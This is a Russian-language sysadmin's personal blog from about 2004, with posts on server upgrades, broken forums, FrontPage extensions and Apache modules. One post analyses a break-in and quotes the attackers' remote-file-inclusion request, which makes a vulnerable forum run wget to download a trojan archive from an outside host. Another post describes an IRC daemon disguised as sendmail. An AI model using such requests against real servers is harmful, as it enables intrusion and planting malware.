longot: (Всадник)
Подарили мне 256 метров памяти димами, я ее всетаки решил установить в сервер.
Поехал на площадку, поставил память, включил машину ... и тут мне звонят с работы, говорят срочно приезжай. Я не проверив как все поднялось поехал на работу. А нужно было проверить. Эх. Одна планка не заработала. И теперь видно всго 128 мегабайт. Прийдется во вторник или среду ехать опять на площадку, смотреть, почему память не работает.
longot: (Default)
Блин! Что за жизнь? Что за админы?

Сервер Аладона валяется четвертые сутки, немогу зайти на форум.
Форум Нерониса падает каждый день, нужно пинать чтоб подняли.
Прошел уже месяц после подачи заявки на обратную зону для айпи моей фирмы, нихера не сделали, хоть я и напиминаю ежедневно.
Нашел сайт с докуметацией по Питону, больше половины ссылок битые, что за идиоты делают сайт с документацией со всеми внешними ссылками?
Компилирую Java RE & SDK, скатина не хочет собиратся. Хрен поймет изза чего ошибка.

Блин. Одно радует. Сервер Силана рботает. Есть всетаки в жизни стабильность.
longot: (Default)
Как я люблю когда люди регистрируют что либо, а подтверждение пароля должно присылатся на ящик бесплатной почты. Особенно такой, которая удаляет неактивные ящики.

Это просто праздник какойто :)

Взлом

Sep. 14th, 2004 01:40 pm
longot: (Default)
Я таки нашел как ломают мои сервера! =)

Все оказалось до банального просто.
У одного из пользователей установлен както форум. Толи phpbb толи phpnuke. Причем достаточно старый и достаточно дырявый. Хакерам оставалось сделать только следующее, написать хитрый запрос который выполняет на сервере команду wget (вот в том что она всетаки выполняетсья я виноват сам)

Тоесть запрос получаеться вида
/modules/coppermine/themes/default/theme.ph
p?THEME_DIR=http://www.deathwar.org/root.txt?&cmd=cd%20/var/tmp;wget%20ek0y.com/ekoy/eko.tar.gz

Причем сам файл root.txt тоже не простой =)

он то и выполняет команду. Нужно будет поикать, как же они этот файл записывают. Думаю что не сложнее чем с запросом.

В итоге мы имеем:
server:/var/tmp/vi.recover/...# ls -a
./ ../ llc* wtc*

Вот это и есть те самые трояны, либо части осла.
Далее дело техники - зайти на сервер и закачать кучу всякой всячены.
longot: (Default)
Только что нашел на однои мз серверов, чудом сохранивниеся файлы, оставшиеся после очень старого взлома сервер. Взломщик установил осла на сервере и разшарил музыку и всякий софт. Там была готика... много готика даже было такое va-ukrainian_gothic_industrial_compilation.-.vol1-2003_320_kbps_(sharemetal.com).rar
Я в шоке. А еще больше от того, что хозяин сервер пообещал мне записать то что я выберу на диски и прислать!
14 гигабайт..... Нужно чтото выбрать.
longot: (Всадник)
Уже долго бьюсь с frontpage серверным расширением под линукс. Только сегодня удалось скачать правильную версию :) До этого скачивал с сайта microsoft и apachetoolbox неработают сволочи. Скачав с сайта www.rtr.com, разработчика frontpage серверного расширения под линукс, удалось его правильно утсановить. Хотя неделю назад скачаный тоже неработал. Видать они там чтото проапдейтили. Там даже оказалась поддержка apache2, то тоже приятно, хоть я его и не использую.
Серверная часть работает. Теперь бьюсь, чтоб клиенская часть работала. Я ниразу не пользовался frontpage приходиться идти методом научного тыка. Тока без успешно :( А в логах совершенно чисто, тоесть я еще ненашел в чем ошибка. Просто не конектиться и все. Может я пароль неправильно прописываю? Хотя я даже незнаю как его вообще указывать при подсоеденении...
Ничего, переборим и эту проблему =) Хорошо что время есть, хоть и мало.
longot: (Default)
Проблема OpenSource - это несогласованность.
Вчера ставил ApacheToolBox все хорошо, хорошая утилита. Мне потребовалось поставить mod_perl но вот незадача, не ставиться, я долго бился с этим модулем, в итоге выяснил что он для 2 апачи, а я мало того что использую 1, так еще и сам тулбокс написан для 1 апачи. Речение было простое, нужно было заменить версию модуля с 1.99_10 на 1.29 и о чудо! Все собралось =) Тоже самое с mod_gzip пришлось несколько утаревшую версию устанавливать.
longot: (Default)
Сижу слушаю Боба Марли.
Хорошо......
Попутно апгреджу серве заказчика, главно чтоб после апгрейда ничего не упало =)
longot: (Default)
Я немогу понять, неужели немец читает мои мысли?
Сегодня он мне предложил растянуть кластер из 20 серверв для увеличения производительности, только чтото я в этом не уверен, используеться апача майскул и томкат. Хотя попробывать стоит, Я об этом уже на днях назмышял. Главное чтобы чтото не упало =)
Вот вчера уних на одном из винтов пошли беды, я начал спрашивать что да как, оказалость что у них сервера стоят под ИДЕ винтами и даже без использования рейд масива! Какой ужас. И это все хостинг с тыщей клиентов. Потм мне сказали что Скайзишные винты очень дорогие в Германии, да где жни дешевые бывают? Если важна производительность и отказо устойчивость лучше юзать хорошее и проверенное серверное оборудование =)
Хотя... Может он еще на скайзи винты не накопил =)
longot: (Default)
Забавную фичу нашел на одном из серверов. Было запущено 4 процесса сендмайла которые слушали разные порты. При более детальном исследовании выяснилось, что на самом деле это не сендмаил а юзверем запущеный скрипт, являющийся ИРЦ демоном(или чемто похожим) который маскируеться под сендмаил. Умный юзверь просек что можно вносить изменения в кронтаб ноубоди, и записал туда свой скрипт стартующий ИРЦ демона. Я в шоке! Как админ не досмотрел такую фичу =)
longot: (Default)
Тут заказчик прикупил себе 2 сети класса С, а я сижу на его 20 серверах прописываю все это....
Бррр жуть какаято =)
На кой ему 600 новых айпишников на 20 серверах, понимаю еслиб он себе сорню другую серверов поставил, хотя это тоже гемор =)

December 2016

S M T W T F S
    123
456 7 89 10
111213 14151617
181920212223 24
252627 282930 31

Syndicate

RSS Atom

Style Credit

Expand Cut Tags

No cut tags
Page generated Jul. 13th, 2025 09:15 am
Powered by Dreamwidth Studios